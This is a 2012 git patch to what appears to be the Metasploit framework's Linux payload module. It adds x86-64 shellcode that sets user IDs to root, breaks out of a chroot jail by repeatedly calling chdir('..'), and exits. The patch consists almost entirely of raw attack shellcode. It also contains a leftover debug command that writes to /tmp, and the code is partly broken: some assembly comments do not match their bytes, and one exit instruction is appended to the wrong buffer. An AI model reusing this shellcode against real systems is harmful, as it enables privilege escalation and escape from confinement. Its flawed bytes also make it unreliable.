From fe2caf2fe402deee9e925cf18dd2293da5fdbdd4 Mon Sep 17 00:00:00 2001 From: Maciej Kotowicz Date: Thu, 26 Jan 2012 00:51:06 +0100 Subject: [PATCH] `advance` linux x64 payloads --- lib/msf/core/payload/linux.rb | 93 +++++++++++++++++++++++++++++++++++ 1 file changed, 93 insertions(+) diff --git a/lib/msf/core/payload/linux.rb b/lib/msf/core/payload/linux.rb index 77f56462a2..1f9779a852 100644 --- a/lib/msf/core/payload/linux.rb +++ b/lib/msf/core/payload/linux.rb @@ -124,6 +124,7 @@ module Msf::Payload::Linux # build ".." str (ptr in ebx) "\x31\xc0" +# xorl %eax,%eax # "\x50" +# pushl %eax # + "\x66\x68\x2e\x2e" +# pushw $0x2e2e # "\x89\xe3" +# movl %esp,%ebx # # loop changing dir @@ -137,6 +138,7 @@ module Msf::Payload::Linux "\x89\xd9" +# movl %ebx,%ecx # "\x58" +# popl %eax # "\xcd\x80" # int $0x80 # + `echo "foo size: #{pre.size}" > /tmp/dupa` end # Append @@ -203,7 +205,98 @@ module Msf::Payload::Linux "\x38\x1f\xfe\x02" +# addi r0,r31,-510 # "\x44\xff\xff\x02" # sc # end + end + if (test_arch.include?(ARCH_X86_64)) + + if (datastore['PrependSetresuid']) + # setresuid(0, 0, 0) + pre << "\x48\x31\xff" # xor rdi,rdi # + pre << "\x48\x89\xfe" # mov rsi,rdi # + pre << "\x6a\x75" # push 0x75 # + pre << "\x58" # pop rax # + pre << "\x0f\x05" # syscall # + + end + + if (datastore['PrependSetreuid']) + # setreuid(0, 0) + pre << "\x48\x31\xff" # xor rdi,rdi # + pre << "\x48\x89\xfe" # mov rsi,rdi # + pre << "\x6a\x71" # push 0x71 # + pre << "\x58" # pop rax # + pre << "\x0f\x05" # syscall # + + end + + if (datastore['PrependSetuid']) + # setuid(0) + pre << "\x48\x31\xff" # xor rdi,rdi # + pre << "\x6a\x69" # push 0x69 # + pre << "\x58" # pop rax # + pre << "\x0f\x05" # syscall # + end + + if (datastore['PrependChrootBreak']) + + # setreuid(0, 0) + pre << "\x48\x31\xff" # xor rdi,rdi # + pre << "\x48\x89\xfe" # mov rax,rdi # + pre << "\x48\x89\xf8" # mov rax,rdi # + pre << "\xb0\x71" # mov al,0x71 # + pre << "\x0f\x05" # syscall # + + # generate temp dir name + pre << "\x48\xbf" # mov rdi, # + pre << Rex::Text.rand_text_alpha(8) # random # + pre << "\x56" # push rsi # + pre << "\x57" # push rdi # + + # mkdir(random,0755) + pre << "\x48\x89\xe7" # mov rdi,rsp # + pre << "\x66\xbe\xed\x01" # mov si,0755 # + pre << "\x6a\x53" # push 0x53 # + pre << "\x58" # pop rax # + pre << "\x0f\x05" # syscall # + + # chroot(random) + pre << "\x48\x31\xd2" # xor rdx,rdx # + pre << "\xb2\xa1" # mov dl,0xa1 # + pre << "\x48\x89\xd0" # mov rax,rdx # + pre << "\x0f\x05" # syscall # + + # build .. (ptr in rdi ) + pre << "\x66\xbe\x2e\x2e" # mov si,0x2e2e # + pre << "\x56" # push rsi # + pre << "\x48\x89\xe7" # mov rdi,rsp # + + # loop chdir(..) 69 times + # syscall tendo to modify rcx can't use loop... + pre << "\x6a\x69" # push 0x45 # + pre << "\x5b" # pop rbx # + pre << "\x6a\x50" # push 0x50 # + pre << "\x58" # pop rax # + pre << "\x0f\x05" # syscall # + pre << "\xfe\xcb" # dec bl # + pre << "\x75\xf7" # jnz -7 # + + # chrot (.) (witch should by /) + pre << "\x6a\x2e" # push . (0x2e) # + pre << "\x48\x89\xe7" # mov rdi,rsp # + pre << "\x48\x89\xd0" # mov rax,rdx # + pre << "\x0f\x05" # syscall # + + end + + # Append + + # exit(0) + if (datastore['AppendExit']) + app << "\x48\x31\xff" # xor rdi,rdi # + app << "\x48\x89\xf8" # mov rax,rdi # + pre << "\xb0\x3c" # mov al,0x69 # + app << "\x0f\x05" # syscall # + end end return (pre + buf + app)